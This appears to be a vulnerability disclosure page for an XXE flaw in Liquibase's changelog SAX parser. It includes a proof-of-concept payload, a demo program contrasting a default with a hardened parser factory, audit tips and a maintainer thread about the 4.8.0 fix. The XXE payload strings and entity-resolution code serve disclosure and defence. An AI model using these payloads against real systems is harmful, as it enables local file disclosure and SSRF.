Improper Restriction of XML External Entity Reference in liquibase/liquibase


Reported on Jan 16th 2022


The XMLChangeLogSAXParser() constructor uses a SAXParser obtained from a SAXParserFactory on which neither FEATURE_SECURE_PROCESSING nor any feature restricting DOCTYPE declarations or external entities is set, so a changelog can declare an external entity and have the parser resolve it (XXE). In the constructor:

public XMLChangeLogSAXParser() {
        saxParserFactory = SAXParserFactory.newInstance();

The parser created there is then used in parseToNode(), which reads the changelog straight into it:

            XMLReader xmlReader = parser.getXMLReader();
            xmlReader.parse(new InputSource(new BomAwareInputStream(inputStream)));

Proof of Concept

The key call from above, extracted into a standalone program to show how it can be exploited:

import java.io.ByteArrayInputStream;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;


public class Poc {

    public static void main(String[] args) {
        try {
            // DOCTYPE declares an external general entity; the SYSTEM identifier
            // (elided in the report) names the attacker-chosen file or URL
            String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"\">]><foo>&xxe;</foo>";
            // Same default factory as XMLChangeLogSAXParser(): no secure-processing
            // or entity-restricting features set, so &xxe; is resolved
            SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
            saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
Causes an SSRF to


Through this XXE an attacker who controls a changelog can disclose local files or conduct SSRF attacks against hosts reachable from the machine running Liquibase.
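The following program is an added example, not code from the report or from Liquibase, and it does not claim to reproduce the 4.8.0 fix. It parses a constructed XXE payload twice: once with the default SAXParserFactory the report describes, and once with a hardened factory. One caveat a practitioner should know: on the JDK's built-in parser, FEATURE_SECURE_PROCESSING alone mainly limits entity expansion and does not stop external entities from being resolved, so the hardened factory also refuses DOCTYPE declarations and disables external general and parameter entities, which is appropriate for a format validated against an XSD rather than a DTD. The temp file is a constructed stand-in for the file or internal URL an attacker would target; the class and method names are my own.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class XxeDemo {

    // Factory configured the way the report describes: JDK defaults only.
    static SAXParserFactory unsafeFactory() {
        return SAXParserFactory.newInstance();
    }

    // Hardened factory. The feature URIs are the standard SAX/Xerces ones
    // supported by the JDK's built-in parser. Forbidding DOCTYPE is the
    // single most effective control; the remaining features are defence in
    // depth in case a deployment swaps in a parser that ignores the first.
    static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        return f;
    }

    // Collects character data so we can see whether &xxe; was expanded
    // into the contents of the referenced file.
    static class Collector extends DefaultHandler {
        final StringBuilder text = new StringBuilder();

        @Override
        public void characters(char[] ch, int start, int len) {
            text.append(ch, start, len);
        }
    }

    // Parses the document with the given factory and returns the text it yielded.
    static String parse(SAXParserFactory factory, String xml) throws Exception {
        SAXParser parser = factory.newSAXParser();
        Collector collector = new Collector();
        parser.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)), collector);
        return collector.text.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed target: a temp file standing in for e.g. /etc/passwd or a
        // cloud metadata URL. Requires Java 11+ for Files.writeString.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.writeString(secret, "SECRET-DB-PASSWORD");
        String payload = "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>"
                + "<foo>&xxe;</foo>";

        // Default factory: the entity is resolved and the file contents come back.
        System.out.println("unsafe factory   : " + parse(unsafeFactory(), payload));

        // Hardened factory: the DOCTYPE itself is rejected before any entity is read.
        try {
            parse(hardenedFactory(), payload);
            System.out.println("hardened factory : parsed (unexpected)");
        } catch (SAXException e) {
            System.out.println("hardened factory : rejected (" + e.getMessage() + ")");
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Run it with `javac XxeDemo.java && java XxeDemo`. The first line prints the temp file's contents, demonstrating the disclosure; the second reports a SAXParseException complaining about the DOCTYPE. When auditing a codebase for this class of bug, grep for `SAXParserFactory.newInstance()`, `DocumentBuilderFactory.newInstance()` and `XMLInputFactory.newInstance()` and confirm that each is followed by the DOCTYPE and external-entity features above before the parser is handed untrusted input.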

We are processing your report and will contact the liquibase team within 24 hours. 2 years ago
ready-research modified the report
2 years ago
We created a GitHub Issue asking the maintainers to create a 2 years ago
We have contacted a member of the liquibase team and are waiting to hear back 2 years ago
We have sent a follow up to the liquibase team. We will try again in 7 days. 2 years ago
We have sent a second follow up to the liquibase team. We will try again in 10 days. 2 years ago
We have sent a third and final follow up to the liquibase team. This report is now considered stale. 2 years ago
2 years ago


@admin I was asked to mark this as Valid and Confirm Fix. We did release a fix in our last release, but unfortunately we are not in a position right now to pay a bug bounty. I wanted to verify with you all that this is okay before I approve and confirm. Thanks for your help!

kataggart validated this vulnerability 2 years ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
kataggart marked this as fixed in 4.8.0 with commit 33d9d9 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Jamie Slome
2 years ago


@kataggart - we pay for the bounties! We ( sponsor OSS maintainers in fixing vulnerabilities. This support comes directly from our company but also enterprises that depend upon OSS.

So as a maintainer, you won't have to spend a penny to tap into our security community for support + we will even reward you for fixing vulnerabilities. Win-win! 🏆
